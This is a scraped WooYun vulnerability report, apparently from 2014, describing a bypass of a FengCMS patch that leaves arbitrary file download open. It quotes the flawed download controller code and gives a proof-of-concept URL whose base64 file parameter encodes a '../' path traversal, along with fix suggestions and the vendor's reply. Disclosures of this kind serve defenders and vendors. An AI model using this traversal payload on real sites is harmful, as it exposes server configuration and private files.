FengCMS绕过补丁依旧任意文件下载 | wooyun-2014-068086| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-068086

漏洞标题：FengCMS绕过补丁依旧任意文件下载

漏洞作者： magerx

提交时间：2014-07-10 18:39

修复时间：2014-10-08 18:40

公开时间：2014-10-08 18:40

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-07-10：细节已通知厂商并且等待厂商处理中
2014-07-10：厂商已经确认，细节仅向厂商公开
2014-07-13：细节向第三方安全合作伙伴开放
2014-09-03：细节向核心白帽子及相关领域专家公开
2014-09-13：细节向普通白帽子公开
2014-09-23：细节向实习白帽子公开
2014-10-08：细节向公众公开

简要描述：

非常感谢各位白帽子的辛勤工作！FengCms安全测试站地址：http://guf521656.h163.92hezu.org/ 已经升级到最新版本有效期2014-7-8至2014-7-15 欢迎各位安全界的朋友帮我们寻找安全漏洞！作为一个小小的创业团队，对各位朋友对FengCms的关注表示衷心的感谢！@路人甲
唉厂商今天又艾特了，本来不想再看的。。

详细说明：

app/contorller/downController.php

<?php
/*******************************************************************
 * @authors FengCms 
 * @web     http://www.fengcms.com
 * @email   web@fengcms.com
 * @date    2013-10-30 16:00:12
 * @version FengCms Beta 1.0
 * @copy    Copyright © 2013-2018 Powered by DiFang Web Studio  
 *******************************************************************/
// 请确保 php.ini 配置文件中 output_buffering 值为 On 或者 4096，为 Off 则会导致下载文件乱码。
class downController extends Controller{
	public function index(){
		$_GET['file']=base64_decode($_GET['file']);
		$exp=explode("/",$_GET['file']);
		if($exp[1]=="upload"){
			if(file_exists(ROOT_PATH.$_GET['file'])){			
				header("Content-Type: application/force-download");
				header("Content-Disposition: attachment; filename=".basename($_GET['file'])); 
				readfile(ROOT_PATH.$_GET['file']);
			}else{
				echo '<script type="text/javascript">alert("您要下载的文件不存在！");history.back();</script>';
			}
		}else{
				echo '<script type="text/javascript">alert("您要下载的文件不存在！");history.back();</script>';
		}a
	}
}
?>

唉，这修复。。。
等于没修复啊。直接file=/upload/../httpd.ini,bese64_encode下就好了。。。

漏洞证明：

厂商的测试地址：

http://guf521656.h163.92hezu.org/index.php?controller=down&operate=index&file=L3VwbG9hZC8uLi9odHRwZC5pbmk=

修复方案：

1、限定目录
2、直接取文件名吧
3、白名单限定可下载路径啊文件。

版权声明：转载请注明来源 magerx@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-07-10 18:41

厂商回复：

确实考虑欠周到。我们考虑加了一个过滤。过滤../来防止任意文件下载。谢谢你的提醒！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-068086

漏洞标题：FengCMS绕过补丁依旧任意文件下载

相关厂商：fengcms.com

漏洞作者： magerx

提交时间：2014-07-10 18:39

修复时间：2014-10-08 18:40

公开时间：2014-10-08 18:40

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 magerx@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-068086

漏洞标题：FengCMS绕过补丁依旧任意文件下载

相关厂商：fengcms.com

漏洞作者： magerx

提交时间：2014-07-10 18:39

修复时间：2014-10-08 18:40

公开时间：2014-10-08 18:40

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-068086"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 magerx@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：